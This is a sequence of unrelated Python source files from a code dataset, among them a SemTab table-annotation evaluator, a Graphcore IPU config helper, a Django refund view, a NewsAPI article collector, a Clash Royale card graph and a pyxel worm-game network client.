main()\n","sub_path":"physchem/python/pyami.py","file_name":"pyami.py","file_ext":"py","file_size_in_byte":34198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78079652","text":"\"\"\"\r\nThe code is adapted from the official SemTab evaluator: https://github.com/sem-tab-challenge/aicrowd-evaluator\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport json\r\nimport os\r\nimport argparse\r\n\r\n# prefix1 = 'http://www.wikidata.org/entity/'\r\n# prefix2 = 'https://www.wikidata.org/wiki/'\r\n\r\n\r\nclass CTA_Evaluator:\r\n def __init__(self, answer_file_path, round=1):\r\n \"\"\"\r\n `round` : Holds the round for which the evaluation is being done.\r\n can be 1, 2...upto the number of rounds the challenge has.\r\n Different rounds will mostly have different ground truth files.\r\n \"\"\"\r\n self.answer_file_path = answer_file_path\r\n self.round = round\r\n\r\n def _evaluate(self, client_payload, gt_ancestor_fn, gt_descendent_fn, _context={}):\r\n \"\"\"\r\n `client_payload` will be a dict with (atleast) the following keys :\r\n - submission_file_path : local file path of the submitted file\r\n - aicrowd_submission_id : A unique id representing the submission\r\n - aicrowd_participant_id : A unique id for participant/team submitting (if enabled)\r\n \"\"\"\r\n submission_file_path = client_payload[\"submission_file_path\"]\r\n aicrowd_submission_id = client_payload[\"aicrowd_submission_id\"]\r\n aicrowd_participant_uid = client_payload[\"aicrowd_participant_id\"]\r\n\r\n gt_ancestor = json.load(open(gt_ancestor_fn))\r\n gt_descendent = json.load(open(gt_descendent_fn))\r\n\r\n cols, col_type = set(), dict()\r\n gt = pd.read_csv(self.answer_file_path, delimiter=',', names=['tab_id', 'col_id', 'type'],\r\n dtype={'tab_id': str, 'col_id': str, 'type': str}, keep_default_na=False)\r\n for index, row in gt.iterrows():\r\n col = '%s %s' % (row['tab_id'], row['col_id'])\r\n gt_type = row['type']\r\n\r\n \"\"\"\r\n Trim the entity prefix to avoid mismatching\r\n \"\"\"\r\n\r\n # if gt_type.startswith(prefix1):\r\n # gt_type = gt_type[len(prefix1):]\r\n #\r\n # if gt_type.startswith(prefix2):\r\n # gt_type = gt_type[len(prefix2):]\r\n\r\n col_type[col] = gt_type\r\n cols.add(col)\r\n\r\n annotated_cols = set()\r\n total_score = 0\r\n sub = pd.read_csv(submission_file_path, delimiter=',', names=['tab_id', 'col_id', 'annotation'],\r\n dtype={'tab_id': str, 'col_id': str, 'annotation': str}, keep_default_na=False)\r\n for index, row in sub.iterrows():\r\n col = '%s %s' % (row['tab_id'], row['col_id'])\r\n if col in annotated_cols:\r\n # continue\r\n raise Exception(\"Duplicate columns in the submission file\")\r\n else:\r\n annotated_cols.add(col)\r\n annotation = row['annotation']\r\n # if not annotation.startswith('http://www.wikidata.org/entity/'):\r\n # annotation = 'http://www.wikidata.org/entity/' + annotation\r\n\r\n \"\"\"\r\n Trim the entity prefix to avoid mismatching \r\n \"\"\"\r\n # if annotation.startswith(prefix1):\r\n # annotation = annotation[len(prefix1):]\r\n #\r\n # if annotation.startswith(prefix2):\r\n # annotation = annotation[len(prefix2):]\r\n\r\n if col in cols:\r\n max_score = 0\r\n for gt_type in col_type[col].split():\r\n ancestor = gt_ancestor[gt_type]\r\n ancestor_keys = [k.lower() for k in ancestor]\r\n descendent = gt_descendent[gt_type]\r\n descendent_keys = [k.lower() for k in descendent]\r\n if annotation.lower() == gt_type.lower():\r\n score = 1.0\r\n elif annotation.lower() in ancestor_keys:\r\n depth = int(ancestor[annotation])\r\n if depth <= 5:\r\n score = pow(0.8, depth)\r\n else:\r\n score = 0\r\n elif annotation.lower() in descendent_keys:\r\n depth = int(descendent[annotation])\r\n if depth <= 3:\r\n score = pow(0.7, depth)\r\n else:\r\n score = 0\r\n else:\r\n score = 0\r\n if score > max_score:\r\n max_score = score\r\n\r\n total_score += max_score\r\n\r\n precision = total_score / len(annotated_cols) if len(annotated_cols) > 0 else 0\r\n recall = total_score / len(cols)\r\n f1 = (2 * precision * recall) / (precision + recall) if (precision + recall) > 0 else 0.0\r\n\r\n main_score = f1\r\n secondary_score = precision\r\n\r\n print('%.3f %.3f %.3f' % (f1, precision, recall))\r\n\r\n \"\"\"\r\n Do something with your submitted file to come up\r\n with a score and a secondary score.\r\n \r\n if you want to report back an error to the user,\r\n then you can simply do :\r\n `raise Exception(\"YOUR-CUSTOM-ERROR\")`\r\n \r\n You are encouraged to add as many validations as possible\r\n to provide meaningful feedback to your users\r\n \"\"\"\r\n _result_object = {\r\n \"score\": main_score,\r\n \"score_secondary\": secondary_score\r\n }\r\n return _result_object\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--gt-dir\",\r\n type=str,\r\n required=True)\r\n parser.add_argument(\"--submission-fn\",\r\n type=str,\r\n required=True)\r\n args = parser.parse_args()\r\n # Lets assume the the ground_truth is a CSV file\r\n # and is present at data/ground_truth.csv\r\n # and a sample submission is present at data/sample_submission.csv\r\n answer_file_path = os.path.join(args.gt_dir, \"HardTablesR3_CTA_WD_gt.csv\")\r\n\r\n _client_payload = {}\r\n _client_payload[\"submission_file_path\"] = args.submission_fn\r\n _client_payload[\"aicrowd_submission_id\"] = 1123\r\n _client_payload[\"aicrowd_participant_id\"] = 1234\r\n\r\n # Instantiate a dummy context\r\n _context = {}\r\n # Instantiate an evaluator\r\n aicrowd_evaluator = CTA_Evaluator(answer_file_path)\r\n # Evaluate\r\n result = aicrowd_evaluator._evaluate(_client_payload,\r\n os.path.join(args.gt_dir, \"HardTablesR3_CTA_WD_gt_ancestor.json\"),\r\n os.path.join(args.gt_dir, \"HardTablesR3_CTA_WD_gt_descendent.json\"),\r\n _context)\r\n print(result)\r\n","sub_path":"papers/LinkingPark/Evaluator/Evaluator_2021/HardTable_Round3_CTA_WD_Evaluator.py","file_name":"HardTable_Round3_CTA_WD_Evaluator.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186590754","text":"# Copyright 2019 Graphcore Ltd.\nimport os\nfrom tensorflow.python.ipu import utils\nfrom tensorflow.python.ipu.utils import ExecutionProfileType\n\n\ndef get_config(prng=False,\n ipu_id=-1,\n shards=1,\n number_of_replicas=1,\n max_cross_replica_buffer_size=10*1024*1024,\n merge_infeed_io_copies=True,\n fp_exceptions=True,\n xla_recompute=False,\n seed=None,\n profile=None,\n availableMemoryProportion=None,\n stable_norm=False):\n \"\"\"Builds ipu_options\"\"\"\n\n profile_exec_modes = {\"NO_PROFILE\": ExecutionProfileType.NO_PROFILE,\n \"TILE_PROFILE\": ExecutionProfileType.TILE_PROFILE,\n \"DEVICE_PROFILE\": ExecutionProfileType.DEVICE_PROFILE,\n \"IPU_PROFILE\": ExecutionProfileType.IPU_PROFILE}\n\n config = utils.create_ipu_config(max_cross_replica_sum_buffer_size=max_cross_replica_buffer_size,\n merge_infeed_io_copies=merge_infeed_io_copies,\n always_rearrange_copies_on_the_host=False,\n profiling=profile is not None,\n profile_execution=profile_exec_modes[profile] if profile else None)\n\n if \"GCL_REAL_COLLECTIVES\" in os.environ:\n config = utils.set_gcl_options(config, num_io_tiles=128, gcl_options={\"useGclCollectives\": \"true\", })\n\n if ipu_id == -1:\n config = utils.auto_select_ipus(config, number_of_replicas*shards)\n else:\n config = utils.select_ipus(config, [ipu_id])\n config = utils.set_compilation_options(config, {\n \"device.clearAtomicFlagAfterExchange\": \"false\",\n \"prng.enable\": \"true\" if prng else \"false\",\n \"target.deterministicWorkers\": \"false\" if seed is None else \"true\",\n })\n\n if availableMemoryProportion is not None:\n config = utils.set_convolution_options(config, {\n \"availableMemoryProportion\": str(availableMemoryProportion)\n })\n\n if stable_norm:\n config = utils.set_norm_options(config, use_stable_statistics=True)\n\n if xla_recompute:\n utils.set_recomputation_options(config, allow_recompute=True)\n\n config = utils.set_floating_point_behaviour_options(config, inv=fp_exceptions, div0=fp_exceptions,\n oflo=fp_exceptions, esr=prng, nanoo=True)\n\n return config\n","sub_path":"applications/tensorflow/cnns/training/ipu_utils.py","file_name":"ipu_utils.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190024783","text":"from unittest import TestCase\nfrom models.priority import Priority\nfrom models.registration_message_filter import RegistrationMessageFilter\nfrom mock import Mock\n\n\nclass TestRegistrationMessageFilter(TestCase):\n\n def test_that_message_can_be_prioritized(self):\n mocked_steps_cache = Mock()\n mocked_steps_cache.has_text.return_value = True\n message_filter = RegistrationMessageFilter(mocked_steps_cache, \"any message\")\n\n priority = message_filter.prioritize()\n\n self.assertEqual(priority, Priority.HIGH)\n\n def test_that_text_message_gets_priotized_with_low_priority(self):\n mocked_steps_cache = Mock()\n mocked_steps_cache.has_text.return_value = False\n message_filter = RegistrationMessageFilter(mocked_steps_cache, \"any message\")\n\n priority = message_filter.prioritize()\n self.assertEqual(priority, Priority.LOW)","sub_path":"tests/unit/test_registration_message_filter.py","file_name":"test_registration_message_filter.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299793063","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.views.decorators.csrf import csrf_exempt\nfrom order.models import Order\nfrom django.conf import settings\n\n\nclient = settings.CLIENT\n\n\n@csrf_exempt\ndef order_refund_view(request):\n if request.user.is_authenticated:\n order_num = request.POST.get('order', None)\n line_id = request.POST.get('line', None)\n action = request.POST.get('action', None)\n print(order_num, type(order_num))\n if order_num:\n order = Order.objects.get(number=order_num)\n print(order)\n if action == 'partial':\n line = order.lines.get(id=int(line_id))\n # client.refund(plan_id=3000000020219, new_purchase_price=655.00)\n print(line)\n if line.req_refund_status == '0':\n line.req_refund_status = '1'\n line.save()\n order.save()\n return JsonResponse({'status': 200, 'message': 'The order has been refunded Successfully',\n 'action': 'partial'})\n elif action == 'full':\n if order.is_refund_all == '0':\n order.is_refund_all = '1'\n for line in order.lines.all():\n if line.req_refund_status == '0':\n line.req_refund_status = '1'\n line.save()\n elif order.is_refund_all == '1':\n return JsonResponse(\n {'status': 200, 'message': 'The order has been already refunded', 'action': 'full'})\n elif order.is_refund_all == '3':\n return JsonResponse(\n {'status': 200, 'message': 'Your full refund request has been canceled', 'action': 'full'})\n elif order.is_refund_all == '4':\n return JsonResponse(\n {'status': 200, 'message': 'The order has been already dispatched. So, refund is not possible',\n 'action': 'full'})\n order.save()\n return JsonResponse({'status': 200, 'message': 'The request for full refund has been done Successfully',\n 'action': 'full'})\n else:\n return JsonResponse({'status': 400, 'message': 'Order not found'})\n else:\n return JsonResponse({'status': 401, 'message': 'User is not authenticated.'})\n\n","sub_path":"experimental/OscarAPI/oscar_proj/customer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"239311887","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nmy_dpi = 100\nbarWidth = 0.4\nGender = ['Male', 'Female']\n\ndf = pd.read_csv(\"/home/sonali/CHOP_exercises/Section2/Q2/total_patients_demographics/stacked2.csv\")\nM = df.iloc[:,1].tolist()\nF = df.iloc[:,2].tolist()\nM = [int(i) for i in M]\nF = [int(i) for i in F]\nnames = df.iloc[:,0].tolist()\nr = np.arange(len(names))\n\nbars = np.add(M, F).tolist()\n\nplt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\nplt.bar(r, M, color='#7f6d5f', edgecolor='white', width=barWidth)\nplt.bar(r, F, bottom=M, color='#557f2d', edgecolor='white', width=barWidth)\n\nplt.xticks(r, names, size = 10,rotation=30)\nplt.legend(Gender, loc=2)\nplt.xlabel('Age Groups', fontsize=10)\nplt.ylabel('# of patients', fontsize=10)\nplt.title('Total Number of patients across age groups & gender (irrespective of diagnosis/ encounter)',fontsize=10)\nplt.savefig('/home/sonali/CHOP_exercises/Section2/Q2/total_patients_demographics/stacked_bar_total_patients.pdf', dpi=my_dpi)\n\n","sub_path":"Section2/Q2/total_patients_demographics/chop-data_vis3.py","file_name":"chop-data_vis3.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"237449022","text":"from newsapi.newsapi_client import NewsApiClient\nimport sys\nimport pandas as pd\nimport itertools\nimport tweepy\n\n# Credentials for APIs\n\n# NewsAPI\nnewsapi = NewsApiClient(api_key=\"82a3d51da38f4c48ae8a375ab0246e80\")\nnews_sources = newsapi.get_sources()\n\n# Cannot go over 500 hits in a day. 1 hit for every permutation.\n\n# Race\nrace_list = ['black lives matter', 'racial inequity', 'racial oppression']\nrace_news_data = []\n\n# Environment\nenvironment_list = ['climate change', 'sustainability', 'green energy', 'global warming']\nenvironment_news_data = []\n\n# Addiction\naddiction_list = ['drug addiction', 'alcohol addiction']\naddiction_news_data = []\n\n# Current Hot Topics\ncurrent_list = ['india farmers', 'myanmar', 'asian-american hate']\ncurrent_news_data = []\n\n# LGBT\nlgbt_list = ['lgbt rights', 'gay rights', 'transgender rights', 'gay marriage']\nlgbt_news_data = []\n\n# Poverty\npoverty_list = ['poverty', 'homeless right']\npoverty_news_data = []\n\n# Refugee\nrefugee_list = ['refugee rights']\nrefugee_news_data = []\n\n# Womens Rights\nwomen_list = ['female wages', 'womens rights']\nwomen_news_data = []\n\n# Mental Health\nmental_list = ['mental health', 'mental illness', 'coping with mental illness', 'living with anxiety']\nmental_news_data = []\n\n# Disability rights\ndisability_list = ['Disability rights']\ndisability_news_data = []\n\n\n# Generate query template\ndef query_generator(kwd, data):\n all_articles = newsapi.get_everything(\n q=kwd,\n language='en',\n )\n for article in all_articles['articles']:\n data.append([article['source']['name'], article['title'], article['author'],\n article['description'], article['publishedAt'], article['url'], article['urlToImage'],\n article['content']])\n\n\n# Generate query for each permutation\ndef get_all_article_queries(use_list, newsdata):\n for item in use_list:\n query_generator(item, newsdata)\n\n\n# Function to create dataframe for articles from each topic area\ndef CreateArticledf(key_list, newsdata):\n news_col_names = ['Source', 'Title', 'Author', 'Description', 'Pub_Date', 'url', 'urlToImage', 'Content']\n get_all_article_queries(key_list, newsdata)\n News_DF = pd.DataFrame(newsdata, columns=news_col_names)\n News_DF.drop_duplicates().sort_values(by=['Pub_Date'], ascending=False)\n return (News_DF)\n\n#Race Tweets\nrace_art_df = CreateArticledf(race_list,race_news_data)\n\n#Environment Tweets\nenv_art_df = CreateArticledf(environment_list,environment_news_data)\n\n#Current Tweets\ncur_art_df = CreateArticledf(current_list,current_news_data)\n\n#LGBT Tweets\nlgbt_art_df = CreateArticledf(lgbt_list,lgbt_news_data)\n\n#Poverty Tweets\npov_art_df = CreateArticledf(poverty_list,poverty_news_data)\n\n#Refugee Tweets\nref_art_df = CreateArticledf(refugee_list,refugee_news_data)\n\n#Womens Rights Tweets\nwom_art_df = CreateArticledf(women_list,women_news_data)\n\n#Mental Health Tweets\nmen_art_df = CreateArticledf(mental_list,mental_news_data)\n\n#Disability Tweets\ndis_art_df = CreateArticledf(disability_list,disability_news_data)","sub_path":"app/api/REST/news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"601473182","text":"\n# === Tools for modeling the Clash Royale universe ===\n\n# for later use\nclass Card:\n\n def __init__(self, name):\n self.name = name\n # dictionary containing a weight for each link to another card\n self.links = {}\n\n def getMostUsedWith(self, count=1):\n return sorted(self.links, key=self.links.get, reverse=True)[:count]\n\n def getUsageWith(self, other):\n if other in self.links:\n return self.links[other]\n else:\n return None\n\n def getLeastUsedWith(self):\n return min(self.links, key=self.links.get)\n\n def getMaxWeight(self):\n return max(self.links.values())\n\n # number of links attached\n def getDegree(self):\n return len(self.links)\n\n # sum of weights over all attached links\n def getStrength(self):\n return round(sum(self.links.values()), 3)\n\n# for later use\nclass Deck:\n\n # add some persistent variable here\n def __init__(self, player, trophies, result, opponent):\n self.player = player\n self.trophies = trophies\n self.result = result\n self.opponent = opponent\n\n def getPlayer(self):\n return self.player\n\n def getTrophies(self):\n return self.trophies\n\n def getBattleResult(self):\n return self.result\n\n def getOpponent(self):\n return self.opponent\n\n\ndef create_empty_graph():\n \"\"\"\n :return: an empty graph network where the node attributes model the reality of the game.\n \"\"\"\n\n # There's really two layers of this:\n # - The node attributes establish the nature of the game.\n # - The edges represent usages between cards.\n\n # More pushed decks -> better data representation\n\n # How do we define node attributes to model abilities?, i.e. we cannot hardcode 'drop rage-spell on death'.\n # The attributes should attempt to naturally represent our environment. What are our hyper-parameters?\n\n # - Explicit: rarity, cost, count, targets, range, hitspeed, speed, ~health, ~damage\n # - Implicit: flying, placement (regular, any), building\n\n # Health and damage depend on card level, but this can be dealt with later. Do we assume stats from max level?\n\n\n import networkx as nx\n G = nx.Graph()\n\n G.add_node('ThreeMusketeers',\n rarity='Rare',\n cost=9,\n count=3,\n targets='Air&Ground',\n flying=False,\n range=6.0,\n hitspeed=1.1,\n speed='Medium'\n )\n\n G.add_node('Golem',\n rarity='Epic',\n cost=8,\n count=1,\n targets='Buildings',\n flying=False,\n range=2.0,\n hitspeed=2.5,\n speed='Slow'\n )\n\n G.add_node('RoyalRecruits',\n rarity='Common',\n cost=7,\n count=6,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.3,\n speed='Medium'\n )\n\n G.add_node('PEKKA',\n rarity='Epic',\n cost=7,\n count=6,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.3,\n speed='Medium'\n )\n\n G.add_node('LavaHound',\n rarity='Legendary',\n cost=7,\n count=1,\n targets='Buildings',\n flying=True,\n range=3.5,\n hitspeed=1.3,\n speed='Slow'\n )\n\n G.add_node('MegaKnight',\n rarity='Legendary',\n cost=7,\n count=1,\n targets='Ground',\n flying=False,\n range=2,\n hitspeed=1.7,\n speed='Medium'\n )\n\n G.add_node('RoyalGiant',\n rarity='Common',\n cost=6,\n count=1,\n targets='Buildings',\n flying=False,\n range=5.0,\n hitspeed=1.7,\n speed='Slow'\n )\n\n G.add_node('EliteBarbarians',\n rarity='Common',\n cost=6,\n count=2,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.7,\n speed='VeryFast'\n )\n\n G.add_node('GiantSkeleton',\n rarity='Epic',\n cost=6,\n count=1,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.5,\n speed='Medium'\n )\n\n G.add_node('GoblinGiant',\n rarity='Epic',\n cost=6,\n count=1,\n targets='Buildings',\n flying=False,\n range=2.0,\n hitspeed=1.7,\n speed='Medium'\n )\n\n G.add_node('Sparky',\n rarity='Legendary',\n cost=6,\n count=1,\n targets='Ground',\n flying=False,\n range=5.0,\n hitspeed=4.0,\n speed='Slow'\n )\n\n G.add_node('EliteBarbarians',\n rarity='Common',\n cost=5,\n count=5,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.4,\n speed='Medium'\n )\n\n G.add_node('MinionHorde',\n rarity='Common',\n cost=5,\n count=6,\n targets='Air&Ground',\n flying=True,\n range=2.0,\n hitspeed=1.0,\n speed='Fast'\n )\n\n # ISSUES\n G.add_node('Rascals',\n rarity='Common',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=True,\n range=2.0,\n hitspeed=1.0,\n speed='Medium'\n )\n\n G.add_node('Balloon',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Buildings',\n flying=True,\n range=2.0,\n hitspeed=3.0,\n speed='Medium'\n )\n\n G.add_node('Witch',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=False,\n range=5.0,\n hitspeed=1.1,\n speed='Medium'\n )\n\n G.add_node('Prince',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.4,\n speed='Medium'\n )\n\n G.add_node('Bowler',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Ground',\n flying=False,\n range=5.0,\n hitspeed=2.5,\n speed='Slow'\n )\n\n G.add_node('Executioner',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=False,\n range=4.5,\n hitspeed=2.4,\n speed='Medium'\n )\n\n G.add_node('CannonCart',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Ground',\n flying=False,\n range=5.5,\n hitspeed=1.0,\n speed='Fast'\n )\n\n G.add_node('ElectroDragon',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=True,\n range=3.5,\n hitspeed=2.1,\n speed='Medium'\n )\n\n # ISSUES\n G.add_node('RamRider',\n rarity='Legendary',\n cost=5,\n count=1,\n targets='Buildings',\n flying=False,\n range=1.8,\n hitspeed=1.8,\n speed='Medium'\n )\n\n return G\n\n","sub_path":"meta_handling.py","file_name":"meta_handling.py","file_ext":"py","file_size_in_byte":8269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"10022186","text":"# coding: utf-8\n\nimport json\n\ndicDir = \"../../result/\"\ndic = json.loads(open(dicDir + \"region.json\",\"r\").read())\n\ndef chonghe():\n res = {}\n for i in dic:\n for j in dic[i]:\n if not j in res:\n res[j] = []\n res[j].append(i)\n for i in res:\n if len(res[i]) > 1:\n print(i,res[i])\n\ndef qiyi():\n for i in dic:\n for j in dic[i]:\n if (len(j) == 2 and j[1] == \"区\") or (j[:2] == \"市辖\"):\n print(j,i)\n #idx = dic[i].index(j)\n #del dic[i][idx]\n open(dicDir + \"region.json\",\"w\").write(json.dumps(dic))\n\nif __name__ == \"__main__\":\n chonghe()\n #qiyi()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"157853028","text":"\"\"\"\nScript that takes a picture with the project's Allied Vision camera and sends it\nto an inference server via REST requests. The server returns the inference result,\nwhich is then sent to Kepware and Thingworx. Thingworx also receives the image\nthat was sent to the inference server.\n\nThe inference server runs on an Auto ML Vision's Docker container. The container\nexposes a REST API with which clients can communicate.\n\nChange the values of the following variables to customise the functionality of\nthis script:\n\nTF_SERVING_HOST: URL of the inference host. Defaults to 192.168.1.110.\nTF_SERVING_PORT: Port of the inference host. Defaults to 8501.\nIMAGE_WIDTH: Width to which the acquired image is resized. Default: 160\nIMAGE_HEIGHT: Height to which the acquired image is resized. Default: 160\n\nKEPWARE_HOST: URL of the Kepware server. Defaults to http://192.168.1.25:39320\nTHINGWORX_HOST: URL of the Thingworx server. Defaults to http://192.168.1.97:8003/Thingworx\n\nLOGGING_LEVEL: Logging level. Default: DEBUG\nLOG_FILE: File where the messages are logged.\n\"\"\"\n\n# Imports\nimport os\nimport logging\nimport time\n\nimport numpy as np\nimport cv2 # opencv-python==4.1.0.25\n\nimport dcc.utils\nfrom dcc.ilqi_inference import RestInferenceClient\n\n# TODO Get casted environment variables\n\n## Runtime configuration\n# Inference\nTF_SERVING_HOST = os.environ.get('TF_SERVING_HOST', '192.168.1.110')\nTF_SERVING_PORT = os.environ.get('TF_SERVING_PORT', 8501)\n\n# Camera and image settings\nIMAGE_WIDTH = os.environ.get('IMAGE_WIDTH', 160)\nIMAGE_HEIGHT = os.environ.get('IMAGE_HEIGHT', 160)\n\n# Connection\nKEPWARE_HOST = os.environ.get('KEPWARE_HOST', 'http://192.168.1.25:39320')\nTHINGWORX_HOST = os.environ.get('SEND_THINGWORX', 'http://192.168.1.97:8003/Thingworx')\n\n# Logging\nLOGGING_LEVEL = os.environ.get('LOGGING_LEVEL', 'DEBUG')\nLOG_FILE = os.environ.get('LOG_FILE', './quality_inspector/logs/rest_client.log')\n\n# logger\nlogger = None\n\n# Client\nrest_client = None\n\n### Scripts main functionality goes into this function\ndef preprocess_image(image):\n \"\"\"\n Takes an image, adapts it to what the inference server accepts (serialised\n jpeg), sends it to the server and processes de result.\n Args:\n image: Expects a 3D np.ndarray with dtype=np.uint8\n \"\"\"\n # Resize image\n return cv2.resize(image, (IMAGE_HEIGHT, IMAGE_WIDTH))\n\n### Modify this function only if you know what you're doing\ndef run():\n \"\"\"\n Calls the dcc.camera.camera_loop function and passes request_inference()\n to it. If something goes wrong, the error is logged and the program stops.\n The programme can also be stopped with the CTRL+C signal.\n \"\"\"\n # Execute camera's loop. Prevent the container from \n while (True):\n try:\n # This function runs without stopping\n rest_client.run_ilqi(preprocess_image=preprocess_image)\n\n # Terminated by keyboard\n except KeyboardInterrupt:\n # Stop the programme and clean up\n logger.info('Keyboard interruption caught. Programme stopped.')\n break\n\n # Some other error. Wait 10 seconds and try to reconnect with the camera again\n except Exception as e:\n logger.error(e, exc_info=True)\n logger.info(\"Error while connecting to the camera. Retrying in 60 seconds.\")\n time.sleep(60)\n \n\nif __name__ == '__main__':\n # Prepare logger instance. Logging directory, needs to be created in the Dockerfile\n if LOGGING_LEVEL == 'INFO':\n logger = dcc.utils.setup_custom_logger(LOG_FILE, 'ilqi logger', logging.INFO)\n else:\n logger = dcc.utils.setup_custom_logger(LOG_FILE, 'ilqi logger', logging.DEBUG)\n\n # Setup client\n rest_client = RestInferenceClient(TF_SERVING_HOST,\n TF_SERVING_PORT,\n kepware_host=KEPWARE_HOST,\n thingworx_host=THINGWORX_HOST,\n logger=logger)\n\n # Run the programme\n run()\n \n","sub_path":"quality_inspector2/python/inference_rest_client.py","file_name":"inference_rest_client.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"153438266","text":"from rest_framework import serializers\nfrom .models import Stocks, MutualFunds, USStocks, FixedDeposits\n\nclass StocksSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stocks\n fields = ('name', 'price', 'openPrice', 'prevPrice', 'volume', 'value',\n 'marketCap', 'peRatio', 'pbRatio', 'roe', 'eps', 'dividendYield',\n 'industryPE', 'bookValue', 'todayslow', 'todayshigh', 'about', 'parentOrg', 'director', 'NSE', 'founded')\n\n\nclass MutualFundsSerializer(serializers.ModelSerializer):\n class Meta:\n model = MutualFunds\n fields = ('name', 'returns', 'returnsThree', 'returnsFive', 'category', \n 'categoryThree', 'categoryFive', 'risk', 'minSIP', 'expenseRatio', \n 'nav', 'fundStarted', 'fundSize')\n\nclass USStocksSerializer(serializers.ModelSerializer):\n class Meta:\n model = USStocks\n fields = ('name', 'price', 'openPrice', 'prevPrice', 'volume', 'avgVolume',\n 'marketCap', 'peRatio', 'pbRatio', 'roe', 'eps', 'dividendYield',\n 'enterpriseValue', 'bookValue', 'todayslow', 'todayshigh', 'about', 'organisation', 'industry', 'headquarters')\n\nclass FixedDepositsSerializer(serializers.ModelSerializer):\n class Meta:\n model = FixedDeposits\n fields = ('name', 'percentage', 'minAmount', 'compounding', 'preWithdrawal',\n 'about', 'crisilRating', 'CEO', 'headquaters')","sub_path":"stockexchange/stocks/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"520974446","text":"\"\"\" Client implementation \"\"\"\n\nfrom typing import List\nimport sys\n#import pygame\nimport pyxel as P\n\nfrom worm_game import InputHandler, InputState,TCPClient, DEFAULT_PORT,GameState, Snake,Human,Game # Player removed\n\nclass ClientApp:# \"\"\" Client window that connects to the server \"\"\"\n def __init__(self, host_addr, port = DEFAULT_PORT):\n# pygame.init()\n P.init(240,160,scale=2)# pygame >> pyxel\n self.GS = GameState()\n self.server_connection = TCPClient((host_addr, port))\n self.done = 0\n self.players = []\n self.inputs = InputHandler()\n\n self.draw_game = Game().draw_game\n # might not be needed when syncing to server\n# self.clock = pygame.time.Clock()\n\n self.add_player(Human('R1', GAME.inputs, (P.KEY_LEFT, P.KEY_RIGHT)))\n self.add_player(Human('R2', GAME.inputs, (P.KEY_A, P.KEY_D)))#(P.K_LEFT, P.K_RIGHT)\n\n def add_player(self, player):self.players.append(player)#\"\"\" Add a player to the game. \"\"\"\n\n def handle_events(self):#\"\"\" Main event pump \"\"\"\n ''' tmp disable\n for event in pygame.event.get(): # User did something\n if event.type == pygame.QUIT: # If user clicked close\n self.done = 1 # Flag that we are done so we exit this loop\n else:self.inputs.handle_event(event)\n '''\n def update_game_state(self):#\"\"\" Apply server state updates to local state \"\"\"\n for game_update in self.server_connection.received_game_updates:\n self.GS.remove_pizzas(game_update.removed_pizzas)\n self.GS.PZ += game_update.added_pizzas\n for sid, sdir, rem_count, parts in game_update.snake_updates:\n while sid >= len(self.GS.SN):self.GS.SN.append(Snake((0, 0, 0)))\n snake = self.GS.SN[sid]\n snake.dir = sdir\n snake.add_parts(parts)\n snake.remove_n_parts(rem_count)\n self.server_connection.received_game_updates.clear()\n\n def update_collision_structures(self):#\"\"\" Update collision structure for the use of AI player \"\"\"\n for snake in self.GS.SN:\n self.GS.COLMGR.add_parts(snake.new_parts)\n self.GS.COLMGR.remove_parts(snake.removed_parts)\n\n def process_player_input(self):#\"\"\" Resolve player input and push it to server \"\"\"\n for local_id, player in enumerate(self.players):\n player.act()\n self.server_connection.send_snake_input(local_id,player.get_snake_input())\n\n def run(self):#\"\"\" Main Program Loop \"\"\"\n for local_id, player in enumerate(self.players):\n self.server_connection.register_player(local_id, player)#\"\"\" Register client players to the server \"\"\"\n\n while not self.done:\n self.handle_events()\n\n if not self.server_connection.receive_game_uptate():\n self.done = 1\n break\n\n self.update_game_state()\n self.update_collision_structures()\n self.process_player_input()\n self.draw_game(self.GS)\n 